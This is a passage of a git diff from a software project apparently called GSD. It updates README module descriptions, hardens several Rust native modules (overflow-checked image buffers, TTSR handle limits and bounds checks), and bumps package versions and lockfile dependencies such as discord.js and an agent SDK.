+  </Card>
+  <Card title="Auto mode deep dive" icon="circle-play" href="/guides/auto-mode">
+    How the autonomous execution engine works.
+  </Card>
+  <Card title="Commands reference" icon="terminal" href="/guides/commands">
+    Every command, shortcut, and CLI flag.
+  </Card>
+  <Card title="Configuration" icon="gear" href="/guides/configuration">
+    Models, budgets, timeouts, and preferences.
+  </Card>
+</CardGroup>
diff --git a/native/README.md b/native/README.md
index bf818e9d5..4f6829681 100644
--- a/native/README.md
+++ b/native/README.md
@@ -6,8 +6,11 @@ Rust N-API addon providing high-performance native modules for GSD.
 
 ```
 JS (packages/native) -> N-API -> Rust crates
-                                  ├── engine/  (N-API bindings, cdylib)
-                                  └── grep/    (ripgrep internals, pure Rust lib)
+
+native/crates/
+├── engine/  (N-API bindings, cdylib — 20+ modules)
+├── grep/    (ripgrep internals, pure Rust lib)
+└── ast/     (ast-grep structural search)
 ```
 
 Inspired by [Oh My Pi's pi-natives](https://github.com/can1357/oh-my-pi), adapted for GSD's Node.js runtime.
@@ -15,7 +18,7 @@ Inspired by [Oh My Pi's pi-natives](https://github.com/can1357/oh-my-pi), adapte
 ## Prerequisites
 
 - **Rust** (stable, 1.70+): https://rustup.rs
-- **Node.js** (20.6+)
+- **Node.js** (22.0.0+)
 
 ## Build
 
@@ -41,6 +44,34 @@ npm run test:native
 
 ## Modules
 
+### ast
+
+Structural code search via ast-grep. Provides pattern-based code matching that understands language syntax, enabling searches like "find all functions that return a Promise" rather than raw regex.
+
+### clipboard
+
+Native clipboard access for reading and writing system clipboard contents.
+
+### diff
+
+Fuzzy text matching and unified diff generation. Provides efficient comparison of text content with configurable matching thresholds.
+
+### fd
+
+Fuzzy file path discovery. Locates files by partial name matching across the project tree.
+
+### fs_cache
+
+Filesystem caching layer. Caches file metadata and contents to reduce redundant I/O during repeated operations.
+
+### git
+
+Libgit2-backed git read operations. Provides fast, direct access to repository status, diffs, blame, and log without shelling out to the `git` CLI.
+
+### glob / glob_util
+
+Gitignore-aware file discovery. Walks directory trees while respecting `.gitignore` rules, returning matching paths for a given glob pattern.
+
 ### grep
 
 Ripgrep-backed regex search using the `grep-regex`, `grep-searcher`, and `grep-matcher` crates.
@@ -72,6 +103,54 @@ const contentResult = searchContent(Buffer.from(fileContent), {
 });
 ```
 
+### gsd_parser
+
+GSD file parsing and frontmatter extraction. Reads `.gsd` files and extracts structured metadata from YAML frontmatter blocks.
+
+### highlight
+
+Syntect-based syntax highlighting. Tokenizes source code and produces highlighted output for terminal or HTML rendering.
+
+### html
+
+HTML-to-Markdown conversion. Transforms HTML content into clean Markdown, useful for importing web content into GSD notes and documents.
+
+### image
+
+Image decoding, encoding, and resizing. Supports common formats (PNG, JPEG, WebP) and provides efficient thumbnail generation.
+
+### json_parse
+
+JSON parsing utilities. Provides streaming and fault-tolerant JSON parsing for large or partially valid payloads.
+
+### ps
+
+Cross-platform process tree management. Lists, inspects, and terminates process trees by PID, used for managing spawned subprocesses.
+
+### stream_process
+
+Streaming process I/O. Spawns child processes with non-blocking, streamed access to stdout and stderr for real-time output handling.
+
+### task
+
+Task-related native operations. Provides low-level primitives for task scheduling and execution within the native layer.
+
+### text
+
+ANSI-aware text measurement and wrapping. Correctly measures visible width of strings containing ANSI escape codes and wraps text to terminal column widths.
+
+### truncate
+
+Text truncation utilities. Truncates strings to a target length while preserving ANSI sequences and respecting grapheme boundaries.
+
+### ttsr
+
+Tool-triggered system rules. Evaluates and applies system-level rules that activate in response to specific tool invocations.
+
+### xxhash
+
+xxHash hashing. Provides fast, non-cryptographic hashing via the xxHash algorithm for content deduplication and cache keying.
+
 ## Adding New Modules
 
 1. Create a new crate in `native/crates/` (pure Rust library)
diff --git a/native/crates/engine/src/glob.rs b/native/crates/engine/src/glob.rs
index ed17b5b3c..61be0e1de 100644
--- a/native/crates/engine/src/glob.rs
+++ b/native/crates/engine/src/glob.rs
@@ -254,7 +254,7 @@ pub fn glob(
     let ct = task::CancelToken::new(timeout_ms);
 
     task::blocking("glob", ct, move |ct| {
-        run_glob(
+        let result = run_glob(
             GlobConfig {
                 root: fs_cache::resolve_search_path(&path)?,
                 include_hidden: hidden.unwrap_or(false),
@@ -270,6 +270,10 @@ pub fn glob(
             },
             on_match.as_ref(),
             ct,
-        )
+        );
+        // Explicitly drop the ThreadsafeFunction to release the N-API reference
+        // immediately rather than relying on implicit drop ordering.
+        drop(on_match);
+        result
     })
 }
diff --git a/native/crates/engine/src/image.rs b/native/crates/engine/src/image.rs
index 22969ef30..7481e9f7e 100644
--- a/native/crates/engine/src/image.rs
+++ b/native/crates/engine/src/image.rs
@@ -103,31 +103,42 @@ fn decode_image_from_bytes(bytes: &[u8]) -> Result<DynamicImage> {
         .map_err(|e| Error::from_reason(format!("Failed to decode image: {e}")))
 }
 
+/// Compute a capacity hint for the encode buffer using checked arithmetic.
+///
+/// Returns an error instead of panicking when `w * h * bytes_per_pixel`
+/// overflows `usize`.
+fn encode_capacity(w: u32, h: u32, bytes_per_pixel: usize) -> Result<usize> {
+    (w as usize)
+        .checked_mul(h as usize)
+        .and_then(|wh| wh.checked_mul(bytes_per_pixel))
+        .ok_or_else(|| Error::from_reason("Image dimensions too large for encode buffer"))
+}
+
 fn encode_image(img: &DynamicImage, format: u8, quality: u8) -> Result<Vec<u8>> {
     let (w, h) = (img.width(), img.height());
     match format {
         0 => {
-            let mut buffer = Vec::with_capacity((w * h * 4) as usize);
+            let mut buffer = Vec::with_capacity(encode_capacity(w, h, 4)?);
             img.write_to(&mut Cursor::new(&mut buffer), ImageFormat::Png)
                 .map_err(|e| Error::from_reason(format!("Failed to encode PNG: {e}")))?;
             Ok(buffer)
         },
         1 => {
-            let mut buffer = Vec::with_capacity((w * h * 3) as usize);
+            let mut buffer = Vec::with_capacity(encode_capacity(w, h, 3)?);
             let encoder = JpegEncoder::new_with_quality(&mut buffer, quality);
             img.write_with_encoder(encoder)
                 .map_err(|e| Error::from_reason(format!("Failed to encode JPEG: {e}")))?;
             Ok(buffer)
         },
         2 => {
-            let mut buffer = Vec::with_capacity((w * h * 4) as usize);
+            let mut buffer = Vec::with_capacity(encode_capacity(w, h, 4)?);
             let encoder = WebPEncoder::new_lossless(&mut buffer);
             img.write_with_encoder(encoder)
                 .map_err(|e| Error::from_reason(format!("Failed to encode WebP: {e}")))?;
             Ok(buffer)
         },
         3 => {
-            let mut buffer = Vec::with_capacity((w * h) as usize);
+            let mut buffer = Vec::with_capacity(encode_capacity(w, h, 1)?);
             img.write_to(&mut Cursor::new(&mut buffer), ImageFormat::Gif)
                 .map_err(|e| Error::from_reason(format!("Failed to encode GIF: {e}")))?;
             Ok(buffer)
diff --git a/native/crates/engine/src/ttsr.rs b/native/crates/engine/src/ttsr.rs
index 571105936..7a513c7c9 100644
--- a/native/crates/engine/src/ttsr.rs
+++ b/native/crates/engine/src/ttsr.rs
@@ -34,6 +34,15 @@ pub struct NapiTtsrRuleInput {
     pub conditions: Vec<String>,
 }
 
+/// Maximum number of live handles allowed before we refuse to allocate more.
+/// Prevents unbounded memory growth if JS callers forget to free handles.
+const MAX_LIVE_HANDLES: usize = 10_000;
+
+/// Lock the global STORE, recovering gracefully from mutex poisoning.
+fn lock_store() -> std::sync::MutexGuard<'static, HashMap<u64, CompiledRuleSet>> {
+    STORE.lock().unwrap_or_else(|e| e.into_inner())
+}
+
 /// Compile a set of TTSR rules into an optimized regex engine.
 ///
 /// Returns an opaque numeric handle. Each rule has one or more regex condition
@@ -69,10 +78,13 @@ pub fn ttsr_compile_rules(rules: Vec<NapiTtsrRuleInput>) -> Result<f64> {
         mappings,
     };
 
-    STORE
-        .lock()
-        .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))?
-        .insert(handle, compiled);
+    let mut store = lock_store();
+    if store.len() >= MAX_LIVE_HANDLES {
+        return Err(Error::from_reason(format!(
+            "TTSR handle limit reached ({MAX_LIVE_HANDLES}). Free unused handles before compiling more rules."
+        )));
+    }
+    store.insert(handle, compiled);
 
     // Return as f64 since napi BigInt interop is awkward; handles won't exceed 2^53.
     Ok(handle as f64)
@@ -86,9 +98,13 @@ pub fn ttsr_compile_rules(rules: Vec<NapiTtsrRuleInput>) -> Result<f64> {
 pub fn ttsr_check_buffer(handle: f64, buffer: String) -> Result<Vec<String>> {
     let handle_key = handle as u64;
 
-    let store = STORE
-        .lock()
-        .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))?;
+    // Bounds-check: reject handles that were never allocated.
+    let upper_bound = NEXT_HANDLE.load(Ordering::Relaxed);
+    if handle_key == 0 || handle_key >= upper_bound {
+        return Err(Error::from_reason(format!("Invalid TTSR handle: {handle}")));
+    }
+
+    let store = lock_store();
 
     let compiled = store
         .get(&handle_key)
@@ -114,11 +130,14 @@ pub fn ttsr_check_buffer(handle: f64, buffer: String) -> Result<Vec<String>> {
 #[napi(js_name = "ttsrFreeRules")]
 pub fn ttsr_free_rules(handle: f64) -> Result<()> {
     let handle_key = handle as u64;
-
-    STORE
-        .lock()
-        .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))?
-        .remove(&handle_key);
-
+    lock_store().remove(&handle_key);
     Ok(())
 }
+
+/// Free all compiled TTSR rule sets, releasing all memory.
+///
+/// Useful for process cleanup or tests that need a fresh state.
+#[napi(js_name = "ttsrClearAll")]
+pub fn ttsr_clear_all() {
+    lock_store().clear();
+}
diff --git a/native/npm/darwin-arm64/package.json b/native/npm/darwin-arm64/package.json
index 63bbc0a5a..b353e5395 100644
--- a/native/npm/darwin-arm64/package.json
+++ b/native/npm/darwin-arm64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@gsd-build/engine-darwin-arm64",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "description": "GSD native engine binary for macOS ARM64",
   "os": [
     "darwin"
diff --git a/native/npm/darwin-x64/package.json b/native/npm/darwin-x64/package.json
index 8c35ac1ae..130b0a8d8 100644
--- a/native/npm/darwin-x64/package.json
+++ b/native/npm/darwin-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@gsd-build/engine-darwin-x64",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "description": "GSD native engine binary for macOS Intel",
   "os": [
     "darwin"
diff --git a/native/npm/linux-arm64-gnu/package.json b/native/npm/linux-arm64-gnu/package.json
index f4d9c1d7e..451c3a006 100644
--- a/native/npm/linux-arm64-gnu/package.json
+++ b/native/npm/linux-arm64-gnu/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@gsd-build/engine-linux-arm64-gnu",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "description": "GSD native engine binary for Linux ARM64 (glibc)",
   "os": [
     "linux"
diff --git a/native/npm/linux-x64-gnu/package.json b/native/npm/linux-x64-gnu/package.json
index edfb90185..388821fd1 100644
--- a/native/npm/linux-x64-gnu/package.json
+++ b/native/npm/linux-x64-gnu/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@gsd-build/engine-linux-x64-gnu",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "description": "GSD native engine binary for Linux x64 (glibc)",
   "os": [
     "linux"
diff --git a/native/npm/win32-x64-msvc/package.json b/native/npm/win32-x64-msvc/package.json
index 84e34fa68..31ef4a6b7 100644
--- a/native/npm/win32-x64-msvc/package.json
+++ b/native/npm/win32-x64-msvc/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@gsd-build/engine-win32-x64-msvc",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "description": "GSD native engine binary for Windows x64 (MSVC)",
   "os": [
     "win32"
diff --git a/package-lock.json b/package-lock.json
index c5d64fb9d..cae86f699 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "gsd-pi",
-  "version": "2.40.0",
+  "version": "2.66.1",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "gsd-pi",
-      "version": "2.40.0",
+      "version": "2.66.1",
       "hasInstallScript": true,
       "license": "MIT",
       "workspaces": [
@@ -61,6 +61,7 @@
         "@types/node": "^24.12.0",
         "@types/picomatch": "^4.0.2",
         "c8": "^11.0.0",
+        "esbuild": "^0.25.12",
         "jiti": "^2.6.1",
         "typescript": "^5.4.0"
       },
@@ -68,6 +69,7 @@
         "node": ">=22.0.0"
       },
       "optionalDependencies": {
+        "@anthropic-ai/claude-agent-sdk": "^0.2.83",
         "@gsd-build/engine-darwin-arm64": ">=2.10.2",
         "@gsd-build/engine-darwin-x64": ">=2.10.2",
         "@gsd-build/engine-linux-arm64-gnu": ">=2.10.2",
@@ -77,6 +79,30 @@
         "koffi": "^2.9.0"
       }
     },
+    "node_modules/@anthropic-ai/claude-agent-sdk": {
+      "version": "0.2.83",
+      "resolved": "https://registry.npmjs.org/@anthropic-ai/claude-agent-sdk/-/claude-agent-sdk-0.2.83.tgz",
+      "integrity": "sha512-O8g56htGMxrwbjCbqUqRBMNC0O98B7SkPnfQC7vmo3w2DVnUrBj3qat/IBLB8SI4sjVSZHeJrcK7+ozsCzStSw==",
+      "license": "SEE LICENSE IN README.md",
+      "optional": true,
+      "engines": {
+        "node": ">=18.0.0"
+      },
+      "optionalDependencies": {
+        "@img/sharp-darwin-arm64": "^0.34.2",
+        "@img/sharp-darwin-x64": "^0.34.2",
+        "@img/sharp-linux-arm": "^0.34.2",
+        "@img/sharp-linux-arm64": "^0.34.2",
+        "@img/sharp-linux-x64": "^0.34.2",
+        "@img/sharp-linuxmusl-arm64": "^0.34.2",
+        "@img/sharp-linuxmusl-x64": "^0.34.2",
+        "@img/sharp-win32-arm64": "^0.34.2",
+        "@img/sharp-win32-x64": "^0.34.2"
+      },
+      "peerDependencies": {
+        "zod": "^4.0.0"
+      }
+    },
     "node_modules/@anthropic-ai/sdk": {
       "version": "0.73.0",
       "resolved": "https://registry.npmjs.org/@anthropic-ai/sdk/-/sdk-0.73.0.tgz",
@@ -820,13 +846,13 @@
       }
     },
     "node_modules/@aws-sdk/xml-builder": {
-      "version": "3.972.10",
-      "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.10.tgz",
-      "integrity": "sha512-OnejAIVD+CxzyAUrVic7lG+3QRltyja9LoNqCE/1YVs8ichoTbJlVSaZ9iSMcnHLyzrSNtvaOGjSDRP+d/ouFA==",
+      "version": "3.972.17",
+      "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.17.tgz",
+      "integrity": "sha512-Ra7hjqAZf1OXRRMueB13qex7mFJRDK/pgCvdSFemXBT8KCGnQDPoKzHY1SjN+TjJVmnpSF14W5tJ1vDamFu+Gg==",
       "license": "Apache-2.0",
       "dependencies": {
-        "@smithy/types": "^4.13.0",
-        "fast-xml-parser": "5.4.1",
+        "@smithy/types": "^4.14.0",
+        "fast-xml-parser": "5.5.8",
         "tslib": "^2.6.2"
       },
       "engines": {
@@ -1218,6 +1244,155 @@
         "sisteransi": "^1.0.5"
       }
     },
+    "node_modules/@discordjs/builders": {
+      "version": "1.14.1",
+      "resolved": "https://registry.npmjs.org/@discordjs/builders/-/builders-1.14.1.tgz",
+      "integrity": "sha512-gSKkhXLqs96TCzk66VZuHHl8z2bQMJFGwrXC0f33ngK+FLNau4hU1PYny3DNJfNdSH+gVMzE85/d5FQ2BpcNwQ==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "@discordjs/formatters": "^0.6.2",
+        "@discordjs/util": "^1.2.0",
+        "@sapphire/shapeshift": "^4.0.0",
+        "discord-api-types": "^0.38.40",
+        "fast-deep-equal": "^3.1.3",
+        "ts-mixer": "^6.0.4",
+        "tslib": "^2.6.3"
+      },
+      "engines": {
+        "node": ">=16.11.0"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
+    "node_modules/@discordjs/collection": {
+      "version": "1.5.3",
+      "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-1.5.3.tgz",
+      "integrity": "sha512-SVb428OMd3WO1paV3rm6tSjM4wC+Kecaa1EUGX7vc6/fddvw/6lg90z4QtCqm21zvVe92vMMDt9+DkIvjXImQQ==",
+      "license": "Apache-2.0",
+      "engines": {
+        "node": ">=16.11.0"
+      }
+    },
+    "node_modules/@discordjs/formatters": {
+      "version": "0.6.2",
+      "resolved": "https://registry.npmjs.org/@discordjs/formatters/-/formatters-0.6.2.tgz",
+      "integrity": "sha512-y4UPwWhH6vChKRkGdMB4odasUbHOUwy7KL+OVwF86PvT6QVOwElx+TiI1/6kcmcEe+g5YRXJFiXSXUdabqZOvQ==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "discord-api-types": "^0.38.33"
+      },
+      "engines": {
+        "node": ">=16.11.0"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
+    "node_modules/@discordjs/rest": {
+      "version": "2.6.1",
+      "resolved": "https://registry.npmjs.org/@discordjs/rest/-/rest-2.6.1.tgz",
+      "integrity": "sha512-wwQdgjeaoYFiaG+atbqx6aJDpqW7JHAo0HrQkBTbYzM3/PJ3GweQIpgElNcGZ26DCUOXMyawYd0YF7vtr+fZXg==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "@discordjs/collection": "^2.1.1",
+        "@discordjs/util": "^1.2.0",
+        "@sapphire/async-queue": "^1.5.3",
+        "@sapphire/snowflake": "^3.5.5",
+        "@vladfrangu/async_event_emitter": "^2.4.6",
+        "discord-api-types": "^0.38.40",
+        "magic-bytes.js": "^1.13.0",
+        "tslib": "^2.6.3",
+        "undici": "6.24.1"
+      },
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
+    "node_modules/@discordjs/rest/node_modules/@discordjs/collection": {
+      "version": "2.1.1",
+      "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-2.1.1.tgz",
+      "integrity": "sha512-LiSusze9Tc7qF03sLCujF5iZp7K+vRNEDBZ86FT9aQAv3vxMLihUvKvpsCWiQ2DJq1tVckopKm1rxomgNUc9hg==",
+      "license": "Apache-2.0",
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
+    "node_modules/@discordjs/rest/node_modules/@sapphire/snowflake": {
+      "version": "3.5.5",
+      "resolved": "https://registry.npmjs.org/@sapphire/snowflake/-/snowflake-3.5.5.tgz",
+      "integrity": "sha512-xzvBr1Q1c4lCe7i6sRnrofxeO1QTP/LKQ6A6qy0iB4x5yfiSfARMEQEghojzTNALDTcv8En04qYNIco9/K9eZQ==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=v14.0.0",
+        "npm": ">=7.0.0"
+      }
+    },
+    "node_modules/@discordjs/rest/node_modules/undici": {
+      "version": "6.24.1",
+      "resolved": "https://registry.npmjs.org/undici/-/undici-6.24.1.tgz",
+      "integrity": "sha512-sC+b0tB1whOCzbtlx20fx3WgCXwkW627p4EA9uM+/tNNPkSS+eSEld6pAs9nDv7WbY1UUljBMYPtu9BCOrCWKA==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=18.17"
+      }
+    },
+    "node_modules/@discordjs/util": {
+      "version": "1.2.0",
+      "resolved": "https://registry.npmjs.org/@discordjs/util/-/util-1.2.0.tgz",
+      "integrity": "sha512-3LKP7F2+atl9vJFhaBjn4nOaSWahZ/yWjOvA4e5pnXkt2qyXRCHLxoBQy81GFtLGCq7K9lPm9R517M1U+/90Qg==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "discord-api-types": "^0.38.33"
+      },
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
+    "node_modules/@discordjs/ws": {
+      "version": "1.2.3",
+      "resolved": "https://registry.npmjs.org/@discordjs/ws/-/ws-1.2.3.tgz",
+      "integrity": "sha512-wPlQDxEmlDg5IxhJPuxXr3Vy9AjYq5xCvFWGJyD7w7Np8ZGu+Mc+97LCoEc/+AYCo2IDpKioiH0/c/mj5ZR9Uw==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "@discordjs/collection": "^2.1.0",
+        "@discordjs/rest": "^2.5.1",
+        "@discordjs/util": "^1.1.0",
+        "@sapphire/async-queue": "^1.5.2",
+        "@types/ws": "^8.5.10",
+        "@vladfrangu/async_event_emitter": "^2.2.4",
+        "discord-api-types": "^0.38.1",
+        "tslib": "^2.6.2",
+        "ws": "^8.17.0"
+      },
+      "engines": {
+        "node": ">=16.11.0"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
+    "node_modules/@discordjs/ws/node_modules/@discordjs/collection": {
+      "version": "2.1.1",
+      "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-2.1.1.tgz",
+      "integrity": "sha512-LiSusze9Tc7qF03sLCujF5iZp7K+vRNEDBZ86FT9aQAv3vxMLihUvKvpsCWiQ2DJq1tVckopKm1rxomgNUc9hg==",
+      "license": "Apache-2.0",
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
     "node_modules/@electron/get": {
       "version": "2.0.3",
       "resolved": "https://registry.npmjs.org/@electron/get/-/get-2.0.3.tgz",
@@ -1725,6 +1900,10 @@
         }
       }
     },
+    "node_modules/@gsd-build/daemon": {
+      "resolved": "packages/daemon",
+      "link": true
+    },
     "node_modules/@gsd-build/engine-darwin-arm64": {
       "version": "2.10.5",
       "resolved": "https://registry.npmjs.org/@gsd-build/engine-darwin-arm64/-/engine-darwin-arm64-2.10.5.tgz",
@@ -1790,6 +1969,14 @@
         "win32"
       ]
     },
+    "node_modules/@gsd-build/mcp-server": {
+      "resolved": "packages/mcp-server",
+      "link": true
+    },
+    "node_modules/@gsd-build/rpc-client": {
+      "resolved": "packages/rpc-client",
+      "link": true
+    },
     "node_modules/@gsd/native": {
       "resolved": "packages/native",
       "link": true
@@ -1815,9 +2002,9 @@
       "link": true
     },
     "node_modules/@hono/node-server": {
-      "version": "1.19.11",
-      "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.11.tgz",
-      "integrity": "sha512-dr8/3zEaB+p0D2n/IUrlPF1HZm586qgJNXK1a9fhg/PzdtkK7Ksd5l312tJX2yBuALqDYBlG20QEbayqPyxn+g==",
+      "version": "1.19.13",
+      "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.13.tgz",
+      "integrity": "sha512-TsQLe4i2gvoTtrHje625ngThGBySOgSK3Xo2XRYOdqGN1teR8+I7vchQC46uLJi8OF62YTYA3AhSpumtkhsaKQ==",
       "license": "MIT",
       "engines": {
         "node": ">=18.14.1"
@@ -3028,6 +3215,39 @@
       ],
       "peer": true
     },
+    "node_modules/@sapphire/async-queue": {
+      "version": "1.5.5",
+      "resolved": "https://registry.npmjs.org/@sapphire/async-queue/-/async-queue-1.5.5.tgz",
+      "integrity": "sha512-cvGzxbba6sav2zZkH8GPf2oGk9yYoD5qrNWdu9fRehifgnFZJMV+nuy2nON2roRO4yQQ+v7MK/Pktl/HgfsUXg==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=v14.0.0",
+        "npm": ">=7.0.0"
+      }
+    },
+    "node_modules/@sapphire/shapeshift": {
+      "version": "4.0.0",
+      "resolved": "https://registry.npmjs.org/@sapphire/shapeshift/-/shapeshift-4.0.0.tgz",
+      "integrity": "sha512-d9dUmWVA7MMiKobL3VpLF8P2aeanRTu6ypG2OIaEv/ZHH/SUQ2iHOVyi5wAPjQ+HmnMuL0whK9ez8I/raWbtIg==",
+      "license": "MIT",
+      "dependencies": {
+        "fast-deep-equal": "^3.1.3",
+        "lodash": "^4.17.21"
+      },
+      "engines": {
+        "node": ">=v16"
+      }
+    },
+    "node_modules/@sapphire/snowflake": {
+      "version": "3.5.3",
+      "resolved": "https://registry.npmjs.org/@sapphire/snowflake/-/snowflake-3.5.3.tgz",
+      "integrity": "sha512-jjmJywLAFoWeBi1W7994zZyiNWPIiqRRNAmSERxyg93xRGzNYvGjlZ0gR6x0F4gPRi2+0O6S71kOZYyr3cxaIQ==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=v14.0.0",
+        "npm": ">=7.0.0"
+      }
+    },
     "node_modules/@silvia-odwyer/photon-node": {
       "version": "0.3.4",
       "resolved": "https://registry.npmjs.org/@silvia-odwyer/photon-node/-/photon-node-0.3.4.tgz",
@@ -3474,9 +3694,9 @@
       }
     },
     "node_modules/@smithy/types": {
-      "version": "4.13.1",
-      "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.13.1.tgz",
-      "integrity": "sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==",
+      "version": "4.14.0",
+      "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.14.0.tgz",
+      "integrity": "sha512-OWgntFLW88kx2qvf/c/67Vno1yuXm/f9M7QFAtVkkO29IJXGBIg0ycEaBTH0kvCtwmvZxRujrgP5a86RvsXJAQ==",
       "license": "Apache-2.0",
       "dependencies": {
         "tslib": "^2.6.2"
@@ -4208,6 +4428,15 @@
         "@types/node": "*"
       }
     },
+    "node_modules/@types/ws": {
+      "version": "8.18.1",
+      "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz",
+      "integrity": "sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==",
+      "license": "MIT",
+      "dependencies": {
+        "@types/node": "*"
+      }
+    },
     "node_modules/@types/yauzl": {
       "version": "2.10.3",
       "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.10.3.tgz",
@@ -4239,6 +4468,16 @@
         "vite": "^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0"
       }
     },
+    "node_modules/@vladfrangu/async_event_emitter": {
+      "version": "2.4.7",
+      "resolved": "https://registry.npmjs.org/@vladfrangu/async_event_emitter/-/async_event_emitter-2.4.7.tgz",
+      "integrity": "sha512-Xfe6rpCTxSxfbswi/W/Pz7zp1WWSNn4A0eW4mLkQUewCrXXtMj31lCg+iQyTkh/CkusZSq9eDflu7tjEDXUY6g==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=v14.0.0",
+        "npm": ">=7.0.0"
+      }
+    },
     "node_modules/accepts": {
       "version": "2.0.0",
       "resolved": "https://registry.npmjs.org/accepts/-/accepts-2.0.0.tgz",
@@ -4377,9 +4616,9 @@
       }
     },
     "node_modules/basic-ftp": {
-      "version": "5.2.0",
-      "resolved": "https://registry.npmjs.org/basic-ftp/-/basic-ftp-5.2.0.tgz",
-      "integrity": "sha512-VoMINM2rqJwJgfdHq6RiUudKt2BV+FY5ZFezP/ypmwayk68+NzzAQy4XXLlqsGD4MCzq3DrmNFD/uUmBJuGoXw==",
+      "version": "5.2.1",
+      "resolved": "https://registry.npmjs.org/basic-ftp/-/basic-ftp-5.2.1.tgz",
+      "integrity": "sha512-0yaL8JdxTknKDILitVpfYfV2Ob6yb3udX/hK97M7I3jOeznBNxQPtVvTUtnhUkyHlxFWyr5Lvknmgzoc7jf+1Q==",
       "license": "MIT",
       "engines": {
         "node": ">=10.0.0"
@@ -4440,9 +4679,9 @@
       "license": "MIT"
     },
     "node_modules/brace-expansion": {
-      "version": "5.0.4",
-      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.4.tgz",
-      "integrity": "sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==",
+      "version": "5.0.5",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.5.tgz",
+      "integrity": "sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==",
       "license": "MIT",
       "dependencies": {
         "balanced-match": "^4.0.2"
@@ -4967,6 +5206,51 @@
         "node": ">=0.3.1"
       }
     },
+    "node_modules/discord-api-types": {
+      "version": "0.38.42",
+      "resolved": "https://registry.npmjs.org/discord-api-types/-/discord-api-types-0.38.42.tgz",
+      "integrity": "sha512-qs1kya7S84r5RR8m9kgttywGrmmoHaRifU1askAoi+wkoSefLpZP6aGXusjNw5b0jD3zOg3LTwUa3Tf2iHIceQ==",
+      "license": "MIT",
+      "workspaces": [
+        "scripts/actions/documentation"
+      ]
+    },
+    "node_modules/discord.js": {
+      "version": "14.26.2",
+      "resolved": "https://registry.npmjs.org/discord.js/-/discord.js-14.26.2.tgz",
+      "integrity": "sha512-feShi+gULJ6R2MAA4/KkCFnkJcuVrROJrKk4czplzq8gE1oqhqgOy9K0Scu44B8oGeWKe04egquzf+ia6VtXAw==",
+      "license": "Apache-2.0",
+      "dependencies": {
+        "@discordjs/builders": "^1.14.1",
+        "@discordjs/collection": "1.5.3",
+        "@discordjs/formatters": "^0.6.2",
+        "@discordjs/rest": "^2.6.1",
+        "@discordjs/util": "^1.2.0",
+        "@discordjs/ws": "^1.2.3",
+        "@sapphire/snowflake": "3.5.3",
+        "discord-api-types": "^0.38.40",
+        "fast-deep-equal": "3.1.3",
+        "lodash.snakecase": "4.1.1",
+        "magic-bytes.js": "^1.13.0",
+        "tslib": "^2.6.3",
+        "undici": "6.24.1"
+      },
+      "engines": {
+        "node": ">=18"
+      },
+      "funding": {
+        "url": "https://github.com/discordjs/discord.js?sponsor"
+      }
+    },
+    "node_modules/discord.js/node_modules/undici": {
+      "version": "6.24.1",
